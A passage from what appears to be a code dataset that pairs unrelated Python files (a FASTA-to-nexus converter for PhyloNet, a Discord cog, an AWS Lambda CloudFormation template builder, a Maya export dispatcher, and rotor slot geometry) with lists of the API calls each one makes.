(3861, 3906), False, 'from torch.utils.tensorboard import writer\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 13:13:51 2020
this script is made to convert a fastafile to a nexus file to be
used in phylonet (MLE_BiMarkers).
the script produces 01 encoded sequences in nexus format, by
filtering for biallelic markers and selecting 1 ind per taxon
to be listed afterwards.
"""
__author__ = '<NAME>'
__mail__ = '<EMAIL>'
import os
import argparse
from Bio import AlignIO
from Bio.Align import MultipleSeqAlignment
import pandas as pd
import random
from itertools import chain
# produces the final nexus file
def nexico(data_frepname,
prenex,
postnex,
rep_alignment,
individual,
name_len):
with open(data_frepname, 'a') as data_f:
data_f.write(prenex)
for count, seq in enumerate(rep_alignment):
eindi = individual[count]
rep_seq = [x for i, x in enumerate(seq.seq) if i not in triallelic]
bin_seq = ''.join(['1' if rp == st else '0' for rp, st in zip(rep_seq, rep_standard)])
# eispi = ''.join(eidi[0].split('.')).lower()
# rewrite the fastafile for PhyloNet as nexus
with open(data_frepname, 'a') as data_f:
data_f.write(f'{eindi}{" "*int(name_len + 1 - len(eindi))}')
data_f.write(f'{bin_seq}\n')
## reference all ind to specific populations/taxa
# with open(map_frepname, 'a') as map_f:
# if count+1 != len(alignment):
# map_f.write(f'{eindi}\t{eispi}\n')
# else:
# map_f.write(f'{eindi}\t{eispi}')
with open(data_frepname, 'a') as data_f:
data_f.write(postnex)
# number of reticulations
RET = 0
# number of runs
MAX_NUM_RUN = 20
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-i", action="store", dest="rep_dir", required=True,
help="Name of the input fasta file")
parser.add_argument('-n', action='store', dest='topo',
help='nexus file with topology if given')
args = parser.parse_args()
BIG_DIR = args.rep_dir
TOPO = args.topo
# BIG_DIR = '/Users/Thomsn/Desktop/Studium/MEME Programme [current]/Universite de Montpellier [Sem2]/internship_scornavacca_lab/git_lab/phylogenetto/data/real_data/vitis/phylonet/2020_04_vitis_USA_summary_20_reps'
os.chdir(BIG_DIR)
# TOPO = True
rep_list = [diro for diro in os.listdir() if 'rep_' in diro]
for repsdir in rep_list:
# repsdir = f'{rep}'
file_name1 = f'{repsdir}/rep_new_asgnmt.fasta' # change to std
file_name2 = f'{repsdir}/rep_new_asgnmt.fasta'
for file_name in [file_name1, file_name2]:
alignment = AlignIO.read(file_name, 'fasta')
spac = []
ind = []
map_str = ''
for count, seq in enumerate(alignment):
eidi = seq.id.split('\\n')[0].split('|')
eindi = ''.join(eidi[1].split('_'))[-10:].lower()
eispi = ''.join(''.join(eidi[0].split('.')).split('2')).lower()
spac.append(eispi)
ind.append(eindi)
#for ret in range(max_ret + 1):
# if not os.path.exists(repsdir):
# os.makedirs(repsdir)
print(f'~~~ fasta-file {file_name} was set for max {RET} reticulation in: {repsdir} ~~~\n ')
loci_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_biallelic_loci.txt'
# nexus_file for phylonet-input
data_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_data_{RET}_ret.nexus'
## map file referecing taxon and ind.
# map_frepname = f'{repdir}/pnw_imap.txt'
# which loci are mono- or triallelic?
triallelic = []
for base_count in range(len(alignment[0].seq)):
occ_bases = set(list(alignment[:,base_count]))
if len([x for x in occ_bases if x.upper() not in ['A','T','G','C']]) > 0:
print('You have bases which are not ATGC. This script does not account for N or -.\
please change the script and rerun!')
else:
if len(occ_bases) != 2:
triallelic.append(base_count)
print(f' -> there were {len(triallelic)} mono- or triallelic loci reported. those will be \
removed from the alignment for this replicate. A list of the used loci is stored in: {loci_frepname}')
loci_kept = [i for i, _ in enumerate(alignment[0].seq) if i not in triallelic]
with open(loci_frepname, 'a') as loci_f:
loci_f.write(','.join([str(l) for l in loci_kept]))
# first sequence in alignment is by definition standard and will have only 1 in sequence (reference allele)
rep_standard = [x for i, x in enumerate(alignment[0].seq) if i not in triallelic]
# obtain length of longest ind name
name_len = max([len(y) for y in ind])
taxa = list(set(spac))
taxind_postnex = [','.join([ind[i] for i, sp in enumerate(spac) if sp == spe]) for spe in taxa]
# defining nexus preambel and phylonet block
prenex = f'''#NEXUS\nBegin data;\n\
Dimensions ntax={alignment.__len__()} nchar={len(loci_kept)};\n\
Format datatype=dna symbols="012" missing=? gap=-;\n\
Matrix\n\n'''
ret = 0
postnex = f''';End;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mnr 10 -mr {RET} -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
# extending postex, if TOPO is given
if TOPO:
topo_file = f'{repsdir}/rep_{file_name.split("_")[-2]}_topo.nex'
with open(topo_file,'r') as tfile:
soup = tfile.readlines()
for molecules in soup:
if '[&U]' in molecules:
atom = molecules.split('[&U] ')[-1]
postnex = f''';End;\n\n\
BEGIN NETWORKS;\n\
Network net1 = {atom}\
END;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -esptheta -mnr {MAX_NUM_RUN} -mr {RET} -snet (net1) -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
else:
postnex = f''';End;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mr {RET} -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
# writing the nexus file
nexico(data_frepname, prenex, postnex, alignment, ind, name_len)
print(f'~~~ Done! ~~~\n ')
| [
"os.chdir",
"os.listdir",
"Bio.AlignIO.read",
"argparse.ArgumentParser"
] | [((1729, 1832), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__', 'formatter_class': 'argparse.RawDescriptionHelpFormatter'}), '(description=__doc__, formatter_class=argparse.\n RawDescriptionHelpFormatter)\n', (1752, 1832), False, 'import argparse\n'), ((2358, 2375), 'os.chdir', 'os.chdir', (['BIG_DIR'], {}), '(BIG_DIR)\n', (2366, 2375), False, 'import os\n'), ((2422, 2434), 'os.listdir', 'os.listdir', ([], {}), '()\n', (2432, 2434), False, 'import os\n'), ((2688, 2720), 'Bio.AlignIO.read', 'AlignIO.read', (['file_name', '"""fasta"""'], {}), "(file_name, 'fasta')\n", (2700, 2720), False, 'from Bio import AlignIO\n')] |
import asyncio
import discord
from discord.ext.commands import Bot
from discord.ext import commands
from discord import Color, Embed
class Test(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def test(self, ctx):
guild = ctx.message.guild
content = ctx.message.content.split()[1:]
word = content[0]
print(guild.get_member(int(word[3:-1])).nick)
def setup(bot):
bot.add_cog(Test(bot))
| [
"discord.ext.commands.command"
] | [((221, 239), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (237, 239), False, 'from discord.ext import commands\n')] |
from mako.template import Template
from mako.runtime import Context
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from lambdatool.parts import get_the_api_chunk
from lambdatool.cf_import_things import role_parameter_section
from lambdatool.cf_import_things import parameter_role_spec
from lambdatool.cf_import_things import imported_role_spec
from lambdatool.cf_import_things import sg_parameter_section
from lambdatool.cf_import_things import sg_parameter_spec
from lambdatool.cf_import_things import imported_sg_spec
from lambdatool.cf_import_things import subnets_parameter_section
from lambdatool.cf_import_things import subnets_parameter_spec
from lambdatool.cf_import_things import imported_subnets_spec
from lambdatool.cf_import_things import api_output_section
from lambdatool.cf_import_things import output_section
from lambdatool.cf_import_things import lambda_log_group
from lambdatool.cf_import_things import resource_policy_spacer
from lambdatool.cf_import_things import resource_policy
import traceback
import os
import sys
import logging
whitelist = 'whitelist'
export_name = 'export_name'
snsTopicARN = 'snstopicarn'
trustedService = 'trustedservice'
trustedAccount = 'trustedaccount'
reservedConcurrency = 'reservedconcurrency'
schedule = 'scheduleexpression'
service = 'service'
new_line = '\n'
spacer = ' '
sns_topic_arn = """ snsTopicARN:
Description: the ARN of the topic to which we are subscribing
Type: String"""
trusted_service = """ trustedService:
Description: service which this lambda trusts
Type: String"""
trusted_account = """ trustedAccount:
Description: account which this lambda trusts
Type: String"""
reserved_concurrency = """ reservedConcurrency:
Description: the maximum number of concurrent invocations
Type: String"""
schedule_expression = """ scheduleExpression:
Description: rate or cron expression for a scheduled lambda
Type: String"""
sns_subcription_resource = """ TopicSubscription:
Type: AWS::SNS::Subscription
DependsOn: LambdaFunction
Properties:
Endpoint:
Fn::GetAtt: [LambdaFunction, Arn]
Protocol: lambda
TopicArn:
Ref: snsTopicARN
TopicPermission:
Type: AWS::Lambda::Permission
DependsOn: TopicSubscription
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal: sns.amazonaws.com"""
WITH_ACCOUNT = 'WITH_ACCOUNT'
WITHOUT_ACCOUNT = 'WITHOUT_ACCOUNT'
trusted_service_resource = dict()
trusted_service_resource[WITHOUT_ACCOUNT] = """ TrustedService:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal:
Ref: trustedService"""
trusted_service_resource[WITH_ACCOUNT] = """ TrustedService:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal:
Ref: trustedService
SourceAccount:
Ref: trustedAccount"""
reserved_concurrency_resource = ''' ReservedConcurrentExecutions:
Ref: reservedConcurrency'''
rule_id = '{}-{}'.format(
os.environ.get('LAMBDA_NAME', 'unknown'),
os.environ.get('ENVIRONMENT', 'none')
)
schedule_resource = """ LambdaSchedule:
Type: AWS::Events::Rule
DependsOn: LambdaFunction
Properties:
Description: String
ScheduleExpression:
Ref: scheduleExpression
State: ENABLED
Targets:
-
Arn:
Fn::GetAtt: [LambdaFunction, Arn]
Id:
{}
EventPermission:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal: events.amazonaws.com""".format(rule_id)
class TemplateCreator:
_stack_properties = None
_input_file = None
_output_file = None
_template_file = None
_sns_topic_arn_found = False
_trusted_service_found = False
_trusted_account_found = False
_reserved_concurrency_found = False
_create_service = False
_schedule_found = False
_export_name = None
_region = None
_stage_name = None
_short_name = None
_account = None
_ssm_client = None
_import_role = False
_import_subnets = False
_import_security_group = False
_import_sqs_arn = False
_description = None
_create_log_group = False
SSM = '[ssm:'
IMPORT = '[import:'
_food = """ Environment:
Variables:
"""
def __init__(self, ssm_client):
self._ssm_client = ssm_client
def _prop_to_yaml(self, thing):
idx = thing.find('=')
if idx > -1:
key = thing[:idx]
val = thing[(idx+1):].strip()
val = self._get_ssm_parameter(val)
if val:
return key, val
return None, None
def _inject_stuff(self):
try:
with open(self._input_file, 'r') as infile:
for thing in infile:
key, val = self._prop_to_yaml(thing.strip())
if key and val:
self._food += spacer + key + ': ' + val + '\n'
buf = StringIO()
t = Template(filename=self._template_file)
if self._sns_topic_arn_found:
sns_var_bits = sns_topic_arn
sns_resource_bits = sns_subcription_resource
else:
sns_var_bits = ''
sns_resource_bits = ''
if self._trusted_service_found:
if self._trusted_account_found:
trusted_service_var_bits = trusted_service + new_line + trusted_account
trusted_service_resource_bits = trusted_service_resource[WITH_ACCOUNT]
else:
trusted_service_var_bits = trusted_service
trusted_service_resource_bits = trusted_service_resource[WITHOUT_ACCOUNT]
else:
trusted_service_var_bits = ''
trusted_service_resource_bits = ''
if self._reserved_concurrency_found:
reserved_concurrency_var_bits = reserved_concurrency
reserved_concurrency_resource_bits = reserved_concurrency_resource
else:
reserved_concurrency_var_bits = ''
reserved_concurrency_resource_bits = ''
if self._schedule_found:
schedule_var_bits = schedule_expression
schedule_resource_bits = schedule_resource
else:
schedule_var_bits = ''
schedule_resource_bits = ''
if self._create_service:
the_api_bits = get_the_api_chunk(
region=self._region,
stage_name=self._stage_name,
short_name=self._short_name,
account=self._account,
resource_policy=self._resource_policy
)
else:
the_api_bits = ''
if self._import_role:
current_role_parameter_section = ''
role = self._find_imported_csv(
self._stack_properties.get('role', None)
)
role_specification = imported_role_spec.format(role)
else:
current_role_parameter_section = role_parameter_section
role_specification = parameter_role_spec
subnet_specification = None
includeVpcConfig = True
if self._stack_properties.get('subnetIds', None) is None:
current_subnets_parameter_section = None
subnet_specification = None
includeVpcConfig = False
elif self._import_subnets:
current_subnets_parameter_section = ''
subnets = self._find_imported_csv(
self._stack_properties.get('subnetIds', None)
)
for subnet in subnets.split(','):
if subnet_specification:
subnet_specification = subnet_specification + \
'\n' + spacer + \
imported_subnets_spec.format(subnet)
else:
subnet_specification = imported_subnets_spec.format(subnet)
else:
current_subnets_parameter_section = subnets_parameter_section
subnet_specification = subnets_parameter_spec
sg_specification = None
if self._stack_properties.get('securityGroupIds', None) is None:
current_sg_parameter_section = None
sg_specification = None
includeVpcConfig = False
elif self._import_security_group:
current_sg_parameter_section = ''
sg_csv = self._find_imported_csv(
self._stack_properties.get('securityGroupIds', None)
)
for sg in sg_csv.split(','):
if sg_specification:
sg_specification = sg_specification + \
'\n' + spacer + \
imported_sg_spec.format(sg)
else:
sg_specification = imported_sg_spec.format(sg)
else:
current_sg_parameter_section = sg_parameter_section
sg_specification = sg_parameter_spec
logging.info('includeVpcConfig: %s', includeVpcConfig)
if self._export_name:
if self._create_service:
output_section_bits = api_output_section.format(
self._export_name,
self._export_name,
self._export_name
)
else:
output_section_bits = output_section.format(self._export_name, self._export_name)
else:
output_section_bits = ''
if self._create_log_group:
lambda_log_group_bits = lambda_log_group
else:
lambda_log_group_bits = ''
ctx = Context(
buf,
environment_section=self._food,
stackDescription=self._description,
outputSection=output_section_bits,
snsTopicARN=sns_var_bits,
snsSubscriptionResource=sns_resource_bits,
trustedService=trusted_service_var_bits,
trustedServiceResource=trusted_service_resource_bits,
reservedConcurrency=reserved_concurrency_var_bits,
reservedConcurrencyResource=reserved_concurrency_resource_bits,
scheduleExpression=schedule_var_bits,
scheduleResource=schedule_resource_bits,
theAPI=the_api_bits,
roleParameterSection=current_role_parameter_section,
roleSpecification=role_specification,
subnetsParameterSection=current_subnets_parameter_section,
subnetIds=subnet_specification,
sgParameterSection=current_sg_parameter_section,
lambdaLogGroup=lambda_log_group_bits,
securityGroupIds=sg_specification,
includeVpcConfig=includeVpcConfig
)
t.render_context(ctx)
logging.info('writing template {}'.format(self._output_file))
with open(self._output_file, "w") as outfile:
outfile.write(buf.getvalue())
except Exception as wtf:
logging.error('Exception caught in inject_stuff(): {}'.format(wtf))
traceback.print_exc(file=sys.stdout)
sys.exit(1)
def _read_stack_properties(self):
try:
lowered_stack_properties = {}
for key in self._stack_properties:
lowered_key = key.lower()
lowered_stack_properties[lowered_key] = self._stack_properties[key]
role = lowered_stack_properties.get('role', None)
subnets = lowered_stack_properties.get('subnetids', None)
security_group = lowered_stack_properties.get('securitygroupids', None)
sqs_arn = lowered_stack_properties.get('sqsarn', None)
if role and role.startswith(self.IMPORT):
self._import_role = True
if subnets and subnets.startswith(self.IMPORT):
self._import_subnets = True
if security_group and security_group.startswith(self.IMPORT):
self._import_security_group = True
if sqs_arn and sqs_arn.startswith(self.IMPORT):
self._import_sqs_arn = True
if snsTopicARN in lowered_stack_properties:
self._sns_topic_arn_found = True
if trustedService in lowered_stack_properties:
self._trusted_service_found = True
if trustedAccount in lowered_stack_properties:
self._trusted_account_found = True
if reservedConcurrency in lowered_stack_properties:
self._reserved_concurrency_found = True
if schedule in lowered_stack_properties:
self._schedule_found = True
if export_name in lowered_stack_properties:
self._export_name = lowered_stack_properties.get(export_name)
if lowered_stack_properties.get('whitelist', None):
parts = lowered_stack_properties.get(whitelist).split(',')
buf = resource_policy
for cidr in parts:
buf = buf + '\n' + resource_policy_spacer + cidr
self._resource_policy = buf
else:
self._resource_policy = ''
tmp = lowered_stack_properties.get(service, 'false').lower()
if tmp == 'true':
self._create_service = True
except Exception as wtf:
logging.error('Exception caught in read_stack_properties(): {}'.format(wtf))
sys.exit(1)
return True
def create_template(self, **kwargs):
try:
self._input_file = kwargs['function_properties']
self._stack_properties = kwargs['stack_properties']
self._output_file = kwargs['output_file']
self._template_file = kwargs['template_file']
self._region = kwargs['region']
self._stage_name = kwargs['stage_name']
self._short_name = kwargs['short_name']
self._account = kwargs['account']
self._create_log_group = kwargs['create_log_group']
self._description = kwargs.get('description', 'Fantastic Lambda Function')
self._read_stack_properties()
self._inject_stuff()
return True
except Exception as wtf:
logging.error(wtf)
return False
def _get_ssm_parameter(self, p):
"""
Get parameters from Simple Systems Manager
Args:
p - a parameter name
Returns:
a value, decrypted if needed, if successful or None if things go
sideways.
"""
try:
if p.startswith(self.SSM) and p.endswith(']'):
parts = p.split(':')
p = parts[1].replace(']', '')
else:
return p
response = self._ssm_client.get_parameter(Name=p, WithDecryption=True)
return response.get('Parameter', {}).get('Value', None)
except Exception as ruh_roh:
logging.error(ruh_roh, exc_info=False)
return None
def _find_imported_csv(self, raw_str):
answer = None
try:
wrk = raw_str
wrk = wrk.replace('[', '')
wrk = wrk.replace(']', '')
wrk = wrk.replace(' ', '')
parts = wrk.split(':')
answer = parts[1]
except Exception:
answer = None
return answer
if __name__ == '__main__':
templateCreator = TemplateCreator()
templateCreator.create_template(
function_properties='/tmp/scratch/f315ee80/config/dev/function.properties',
stack_properties='/tmp/scratch/f315ee80/stack.properties',
output_file='/tmp/template.yaml',
template_file='template_template'
)
| [
"lambdatool.cf_import_things.imported_subnets_spec.format",
"mako.template.Template",
"os.environ.get",
"lambdatool.cf_import_things.api_output_section.format",
"lambdatool.cf_import_things.output_section.format",
"lambdatool.cf_import_things.imported_role_spec.format",
"sys.exit",
"lambdatool.parts.get_the_api_chunk",
"io.StringIO",
"traceback.print_exc",
"logging.info",
"logging.error",
"lambdatool.cf_import_things.imported_sg_spec.format",
"mako.runtime.Context"
] | [((3352, 3392), 'os.environ.get', 'os.environ.get', (['"""LAMBDA_NAME"""', '"""unknown"""'], {}), "('LAMBDA_NAME', 'unknown')\n", (3366, 3392), False, 'import os\n'), ((3398, 3435), 'os.environ.get', 'os.environ.get', (['"""ENVIRONMENT"""', '"""none"""'], {}), "('ENVIRONMENT', 'none')\n", (3412, 3435), False, 'import os\n'), ((5446, 5456), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5454, 5456), False, 'from io import StringIO\n'), ((5473, 5511), 'mako.template.Template', 'Template', ([], {'filename': 'self._template_file'}), '(filename=self._template_file)\n', (5481, 5511), False, 'from mako.template import Template\n'), ((9780, 9834), 'logging.info', 'logging.info', (['"""includeVpcConfig: %s"""', 'includeVpcConfig'], {}), "('includeVpcConfig: %s', includeVpcConfig)\n", (9792, 9834), False, 'import logging\n'), ((10490, 11385), 'mako.runtime.Context', 'Context', (['buf'], {'environment_section': 'self._food', 'stackDescription': 'self._description', 'outputSection': 'output_section_bits', 'snsTopicARN': 'sns_var_bits', 'snsSubscriptionResource': 'sns_resource_bits', 'trustedService': 'trusted_service_var_bits', 'trustedServiceResource': 'trusted_service_resource_bits', 'reservedConcurrency': 'reserved_concurrency_var_bits', 'reservedConcurrencyResource': 'reserved_concurrency_resource_bits', 'scheduleExpression': 'schedule_var_bits', 'scheduleResource': 'schedule_resource_bits', 'theAPI': 'the_api_bits', 'roleParameterSection': 'current_role_parameter_section', 'roleSpecification': 'role_specification', 'subnetsParameterSection': 'current_subnets_parameter_section', 'subnetIds': 'subnet_specification', 'sgParameterSection': 'current_sg_parameter_section', 'lambdaLogGroup': 'lambda_log_group_bits', 'securityGroupIds': 'sg_specification', 'includeVpcConfig': 'includeVpcConfig'}), '(buf, environment_section=self._food, stackDescription=self.\n _description, outputSection=output_section_bits, snsTopicARN=\n sns_var_bits, snsSubscriptionResource=sns_resource_bits, trustedService\n =trusted_service_var_bits, trustedServiceResource=\n trusted_service_resource_bits, reservedConcurrency=\n reserved_concurrency_var_bits, reservedConcurrencyResource=\n reserved_concurrency_resource_bits, scheduleExpression=\n schedule_var_bits, scheduleResource=schedule_resource_bits, theAPI=\n the_api_bits, roleParameterSection=current_role_parameter_section,\n roleSpecification=role_specification, subnetsParameterSection=\n current_subnets_parameter_section, subnetIds=subnet_specification,\n sgParameterSection=current_sg_parameter_section, lambdaLogGroup=\n lambda_log_group_bits, securityGroupIds=sg_specification,\n includeVpcConfig=includeVpcConfig)\n', (10497, 11385), False, 'from mako.runtime import Context\n'), ((6972, 7139), 'lambdatool.parts.get_the_api_chunk', 'get_the_api_chunk', ([], {'region': 'self._region', 'stage_name': 'self._stage_name', 'short_name': 'self._short_name', 'account': 'self._account', 'resource_policy': 'self._resource_policy'}), '(region=self._region, stage_name=self._stage_name,\n short_name=self._short_name, account=self._account, resource_policy=\n self._resource_policy)\n', (6989, 7139), False, 'from lambdatool.parts import get_the_api_chunk\n'), ((7552, 7583), 'lambdatool.cf_import_things.imported_role_spec.format', 'imported_role_spec.format', (['role'], {}), '(role)\n', (7577, 7583), False, 'from lambdatool.cf_import_things import imported_role_spec\n'), ((12016, 12052), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (12035, 12052), False, 'import traceback\n'), ((12065, 12076), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (12073, 12076), False, 'import sys\n'), ((14413, 14424), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (14421, 14424), False, 'import sys\n'), ((15228, 15246), 'logging.error', 'logging.error', (['wtf'], {}), '(wtf)\n', (15241, 15246), False, 'import logging\n'), ((15949, 15987), 'logging.error', 'logging.error', (['ruh_roh'], {'exc_info': '(False)'}), '(ruh_roh, exc_info=False)\n', (15962, 15987), False, 'import logging\n'), ((9953, 10040), 'lambdatool.cf_import_things.api_output_section.format', 'api_output_section.format', (['self._export_name', 'self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name, self.\n _export_name)\n', (9978, 10040), False, 'from lambdatool.cf_import_things import api_output_section\n'), ((10194, 10253), 'lambdatool.cf_import_things.output_section.format', 'output_section.format', (['self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name)\n', (10215, 10253), False, 'from lambdatool.cf_import_things import output_section\n'), ((8600, 8636), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8628, 8636), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9600, 9627), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9623, 9627), False, 'from lambdatool.cf_import_things import imported_sg_spec\n'), ((8490, 8526), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8518, 8526), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9503, 9530), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9526, 9530), False, 'from lambdatool.cf_import_things import imported_sg_spec\n')] |
# coding: utf-8
# Author: <NAME>
# Contact: <EMAIL>
# Python modules
import os
import logging
import json
logger = logging.getLogger(__name__)
# Wizard modules
from maya_wizard import wizard_plugin
from maya_wizard.export import modeling
from maya_wizard.export import rigging
from maya_wizard.export import custom
from maya_wizard.export import camrig
from maya_wizard.export import layout
from maya_wizard.export import animation
from maya_wizard.export import camera
# read_settings
if 'wizard_json_settings'.upper() in os.environ.keys():
settings_dic = json.loads(os.environ['wizard_json_settings'])
frange = settings_dic['frange']
refresh_assets = settings_dic['refresh_assets']
nspace_list = settings_dic['nspace_list']
stage_name = settings_dic['stage_to_export']
if refresh_assets:
wizard_plugin.update_all()
if stage_name == 'modeling':
modeling.main()
elif stage_name == 'rigging':
rigging.main()
elif stage_name == 'custom':
custom.main()
elif stage_name == 'camrig':
camrig.main()
elif stage_name == 'layout':
layout.main()
elif stage_name == 'animation':
animation.main(nspace_list=nspace_list,
frange=frange)
elif stage_name == 'camera':
camera.main(nspace_list=nspace_list,
frange=frange)
else:
logger.warning("Unplugged stage : {}".format(stage_name))
else:
logger.error("Batch settings not found")
| [
"logging.getLogger",
"os.environ.keys",
"json.loads",
"maya_wizard.export.custom.main",
"maya_wizard.wizard_plugin.update_all",
"maya_wizard.export.modeling.main",
"maya_wizard.export.rigging.main",
"maya_wizard.export.camrig.main",
"maya_wizard.export.camera.main",
"maya_wizard.export.layout.main",
"maya_wizard.export.animation.main"
] | [((117, 144), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (134, 144), False, 'import logging\n'), ((527, 544), 'os.environ.keys', 'os.environ.keys', ([], {}), '()\n', (542, 544), False, 'import os\n'), ((565, 611), 'json.loads', 'json.loads', (["os.environ['wizard_json_settings']"], {}), "(os.environ['wizard_json_settings'])\n", (575, 611), False, 'import json\n'), ((827, 853), 'maya_wizard.wizard_plugin.update_all', 'wizard_plugin.update_all', ([], {}), '()\n', (851, 853), False, 'from maya_wizard import wizard_plugin\n'), ((896, 911), 'maya_wizard.export.modeling.main', 'modeling.main', ([], {}), '()\n', (909, 911), False, 'from maya_wizard.export import modeling\n'), ((954, 968), 'maya_wizard.export.rigging.main', 'rigging.main', ([], {}), '()\n', (966, 968), False, 'from maya_wizard.export import rigging\n'), ((1010, 1023), 'maya_wizard.export.custom.main', 'custom.main', ([], {}), '()\n', (1021, 1023), False, 'from maya_wizard.export import custom\n'), ((1065, 1078), 'maya_wizard.export.camrig.main', 'camrig.main', ([], {}), '()\n', (1076, 1078), False, 'from maya_wizard.export import camrig\n'), ((1120, 1133), 'maya_wizard.export.layout.main', 'layout.main', ([], {}), '()\n', (1131, 1133), False, 'from maya_wizard.export import layout\n'), ((1178, 1232), 'maya_wizard.export.animation.main', 'animation.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1192, 1232), False, 'from maya_wizard.export import animation\n'), ((1302, 1353), 'maya_wizard.export.camera.main', 'camera.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1313, 1353), False, 'from maya_wizard.export import camera\n')] |
from numpy import arcsin, arctan, cos, exp, array, angle, pi
from numpy import imag as np_imag
from scipy.optimize import fsolve
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : HoleM50
A HoleM50 object
Returns
-------
point_dict: dict
A dict of the slot coordinates
"""
Rext = self.get_Rext()
# magnet pole pitch angle, must be <2*pi/2*p
alpham = 2 * arcsin(self.W0 / (2 * (Rext - self.H1))) # angle (Z9,0,Z9')
Harc = (Rext - self.H1) * (1 - cos(alpham / 2))
# alpha on schematics
gammam = arctan((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))
# betam = pi/2-alpham/2-gammam;#40.5
hssp = pi / self.Zh
x78 = (self.H3 - self.H2) / cos(gammam) # distance from 7 to 8
Z9 = Rext - Harc - self.H1 - 1j * self.W0 / 2
Z8 = Rext - self.H0 - 1j * self.W1 / 2
Z7 = Rext - self.H0 - x78 - 1j * self.W1 / 2
Z1 = (Rext - self.H1) * exp(1j * (-hssp + arcsin(self.W3 / (2 * (Rext - self.H1)))))
Z11 = (Z1 * exp(1j * hssp) + self.H4) * exp(-1j * hssp)
Z10 = (Z9 * exp(1j * hssp) + self.H4) * exp(-1j * hssp)
# Magnet coordinate with Z8 as center and x as the top edge of the magnet
Z8a = -1j * (self.H3 - self.H2)
Z8b = self.W2
Z8c = Z8b + self.W4
Z5 = Z8b - 1j * self.H3
Z4 = Z8c - 1j * self.H3
Z6 = Z5 + 1j * self.H2
Z3 = Z4 + 1j * self.H2
Zmag = array([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c])
Zmag = Zmag * exp(1j * angle(Z9 - Z8))
Zmag = Zmag + Z8
# final complex numbers Zmag=[Z8b Z6 Z5 Z4 Z3 Z8c]
(Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c) = Zmag
# Rotation so [Z1,Z2] is parallel to the x axis
Z3r, Z1r, Z6r = Z3 * exp(1j * hssp), Z1 * exp(1j * hssp), Z6 * exp(1j * hssp)
# numerical resolution to find the last point Z2
x = fsolve(lambda x: np_imag((Z3r - (Z1r - x)) / (Z6r - Z3r)), self.H3 - self.H2)
Z2 = (Z1r - x[0]) * exp(-1j * hssp)
point_dict = dict()
point_dict["Z1"] = Z1
point_dict["Z2"] = Z2
point_dict["Z3"] = Z3
point_dict["Z4"] = Z4
point_dict["Z5"] = Z5
point_dict["Z6"] = Z6
point_dict["Z7"] = Z7
point_dict["Z8"] = Z8
point_dict["Z9"] = Z9
point_dict["Z10"] = Z10
point_dict["Z11"] = Z11
point_dict["Z8a"] = Z8a
point_dict["Z8b"] = Z8b
point_dict["Z8c"] = Z8c
# Symmetry
point_dict["Z1s"] = Z1.conjugate()
point_dict["Z2s"] = Z2.conjugate()
point_dict["Z3s"] = Z3.conjugate()
point_dict["Z4s"] = Z4.conjugate()
point_dict["Z5s"] = Z5.conjugate()
point_dict["Z6s"] = Z6.conjugate()
point_dict["Z7s"] = Z7.conjugate()
point_dict["Z8s"] = Z8.conjugate()
point_dict["Z9s"] = Z9.conjugate()
point_dict["Z10s"] = Z10.conjugate()
point_dict["Z11s"] = Z11.conjugate()
point_dict["Z8as"] = Z8a.conjugate()
point_dict["Z8bs"] = Z8b.conjugate()
point_dict["Z8cs"] = Z8c.conjugate()
return point_dict
| [
"numpy.arcsin",
"numpy.angle",
"numpy.exp",
"numpy.array",
